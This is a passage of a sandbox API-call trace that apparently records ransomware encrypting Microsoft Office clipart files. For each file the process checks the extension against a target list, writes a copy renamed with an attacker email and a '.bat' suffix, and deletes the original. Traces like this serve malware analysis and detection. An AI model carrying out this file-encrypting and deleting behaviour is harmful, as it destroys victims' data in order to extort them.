(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.258] lstrlenW (lpString=".doc") returned 4 [0183.258] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.258] lstrlenW (lpString=".docx") returned 5 [0183.258] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.258] lstrlenW (lpString=".pdf") returned 4 [0183.258] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.258] lstrlenW (lpString=".xls") returned 4 [0183.258] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.258] lstrlenW (lpString=".xlsx") returned 5 [0183.258] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.258] lstrlenW (lpString=".ppt") returned 4 [0183.258] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.259] lstrlenW (lpString=".zip") returned 4 [0183.259] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.259] lstrlenW (lpString=".rar") returned 4 [0183.259] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.259] lstrlenW (lpString=".bz2") returned 4 [0183.259] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.259] lstrlenW (lpString=".7z") returned 3 [0183.259] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.259] lstrlenW (lpString=".dbf") returned 4 [0183.259] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.259] lstrlenW (lpString=".1cd") returned 4 [0183.259] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.259] lstrlenW (lpString=".jpg") returned 4 [0183.259] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.259] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.259] lstrlenW (lpString="J0107308.WMF") returned 12 [0183.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.260] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=15888) returned 1 [0183.260] CloseHandle (hObject=0x378) returned 1 [0183.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf")) returned 0x220 [0183.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.260] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.260] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0183.261] GetLastError () returned 0x0 [0183.261] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x3e10, lpOverlapped=0x0) returned 1 [0184.121] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3e20, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3e20, lpOverlapped=0x0) returned 1 [0184.124] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.124] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.124] SetEndOfFile (hFile=0x37c) returned 1 [0184.124] CloseHandle (hObject=0x37c) returned 1 [0184.124] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.124] SetEndOfFile (hFile=0x378) returned 1 [0184.125] CloseHandle (hObject=0x378) returned 1 [0184.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf")) returned 1 [0184.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.126] lstrlenW (lpString=".doc") returned 4 [0184.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.126] lstrlenW (lpString=".docx") returned 5 [0184.126] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.126] lstrlenW (lpString=".pdf") returned 4 [0184.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.126] lstrlenW (lpString=".xls") returned 4 [0184.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.126] lstrlenW (lpString=".xlsx") returned 5 [0184.126] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.126] lstrlenW (lpString=".ppt") returned 4 [0184.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.126] lstrlenW (lpString=".zip") returned 4 [0184.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.126] lstrlenW (lpString=".rar") returned 4 [0184.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.126] lstrlenW (lpString=".bz2") returned 4 [0184.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.127] lstrlenW (lpString=".7z") returned 3 [0184.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.127] lstrlenW (lpString=".dbf") returned 4 [0184.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.127] lstrlenW (lpString=".1cd") returned 4 [0184.127] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.127] lstrlenW (lpString=".jpg") returned 4 [0184.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.127] lstrlenW (lpString=".doc") returned 4 [0184.127] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.127] lstrlenW (lpString=".docx") returned 5 [0184.127] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.127] lstrlenW (lpString=".pdf") returned 4 [0184.127] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.127] lstrlenW (lpString=".xls") returned 4 [0184.127] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.127] lstrlenW (lpString=".xlsx") returned 5 [0184.127] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.127] lstrlenW (lpString=".ppt") returned 4 [0184.127] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.128] lstrlenW (lpString=".zip") returned 4 [0184.128] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.128] lstrlenW (lpString=".rar") returned 4 [0184.128] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.128] lstrlenW (lpString=".bz2") returned 4 [0184.128] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.128] lstrlenW (lpString=".7z") returned 3 [0184.128] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.128] lstrlenW (lpString=".dbf") returned 4 [0184.128] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.128] lstrlenW (lpString=".1cd") returned 4 [0184.128] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF") returned 68 [0184.128] lstrlenW (lpString=".jpg") returned 4 [0184.128] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.128] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.128] lstrlenW (lpString="J0107452.WMF") returned 12 [0184.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.129] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=21216) returned 1 [0184.129] CloseHandle (hObject=0x378) returned 1 [0184.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf")) returned 0x220 [0184.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.129] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.129] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.130] GetLastError () returned 0x0 [0184.130] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x52e0, lpOverlapped=0x0) returned 1 [0184.133] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x52f0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x52f0, lpOverlapped=0x0) returned 1 [0184.134] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.134] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.134] SetEndOfFile (hFile=0x37c) returned 1 [0184.135] CloseHandle (hObject=0x37c) returned 1 [0184.135] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.135] SetEndOfFile (hFile=0x378) returned 1 [0184.136] CloseHandle (hObject=0x378) returned 1 [0184.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.136] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf")) returned 1 [0184.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.136] lstrlenW (lpString=".doc") returned 4 [0184.136] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.136] lstrlenW (lpString=".docx") returned 5 [0184.136] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.137] lstrlenW (lpString=".pdf") returned 4 [0184.137] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.137] lstrlenW (lpString=".xls") returned 4 [0184.137] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.137] lstrlenW (lpString=".xlsx") returned 5 [0184.137] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.137] lstrlenW (lpString=".ppt") returned 4 [0184.137] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.137] lstrlenW (lpString=".zip") returned 4 [0184.137] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.137] lstrlenW (lpString=".rar") returned 4 [0184.137] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.137] lstrlenW (lpString=".bz2") returned 4 [0184.137] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.137] lstrlenW (lpString=".7z") returned 3 [0184.137] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.137] lstrlenW (lpString=".dbf") returned 4 [0184.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.137] lstrlenW (lpString=".1cd") returned 4 [0184.137] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.137] lstrlenW (lpString=".jpg") returned 4 [0184.137] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.138] lstrlenW (lpString=".doc") returned 4 [0184.138] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.138] lstrlenW (lpString=".docx") returned 5 [0184.138] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.138] lstrlenW (lpString=".pdf") returned 4 [0184.138] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.138] lstrlenW (lpString=".xls") returned 4 [0184.138] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.138] lstrlenW (lpString=".xlsx") returned 5 [0184.138] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.138] lstrlenW (lpString=".ppt") returned 4 [0184.138] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.138] lstrlenW (lpString=".zip") returned 4 [0184.138] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.138] lstrlenW (lpString=".rar") returned 4 [0184.138] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.138] lstrlenW (lpString=".bz2") returned 4 [0184.138] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.138] lstrlenW (lpString=".7z") returned 3 [0184.138] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.138] lstrlenW (lpString=".dbf") returned 4 [0184.138] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.138] lstrlenW (lpString=".1cd") returned 4 [0184.138] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 68 [0184.138] lstrlenW (lpString=".jpg") returned 4 [0184.139] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.139] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.139] lstrlenW (lpString="J0107456.WMF") returned 12 [0184.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.156] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=3724) returned 1 [0184.156] CloseHandle (hObject=0x378) returned 1 [0184.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf")) returned 0x220 [0184.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.157] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.157] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.157] GetLastError () returned 0x0 [0184.157] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xe8c, lpOverlapped=0x0) returned 1 [0184.159] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xe90, lpOverlapped=0x0) returned 1 [0184.162] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.162] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.162] SetEndOfFile (hFile=0x37c) returned 1 [0184.162] CloseHandle (hObject=0x37c) returned 1 [0184.163] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.163] SetEndOfFile (hFile=0x378) returned 1 [0184.164] CloseHandle (hObject=0x378) returned 1 [0184.164] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.164] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf")) returned 1 [0184.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.164] lstrlenW (lpString=".doc") returned 4 [0184.164] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.164] lstrlenW (lpString=".docx") returned 5 [0184.164] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.164] lstrlenW (lpString=".pdf") returned 4 [0184.164] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.164] lstrlenW (lpString=".xls") returned 4 [0184.164] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.164] lstrlenW (lpString=".xlsx") returned 5 [0184.164] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.165] lstrlenW (lpString=".ppt") returned 4 [0184.165] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.165] lstrlenW (lpString=".zip") returned 4 [0184.165] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.165] lstrlenW (lpString=".rar") returned 4 [0184.165] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString=".bz2") returned 4 [0184.165] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString=".7z") returned 3 [0184.165] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.165] lstrlenW (lpString=".dbf") returned 4 [0184.165] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.165] lstrlenW (lpString=".1cd") returned 4 [0184.165] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.165] lstrlenW (lpString=".jpg") returned 4 [0184.165] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 68 [0184.165] lstrlenW (lpString=".doc") returned 4 [0184.165] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString=".docx") returned 5 [0184.165] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.165] lstrlenW (lpString=".pdf") returned 4 [0184.165] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.165] lstrlenW (lpString=".xls") 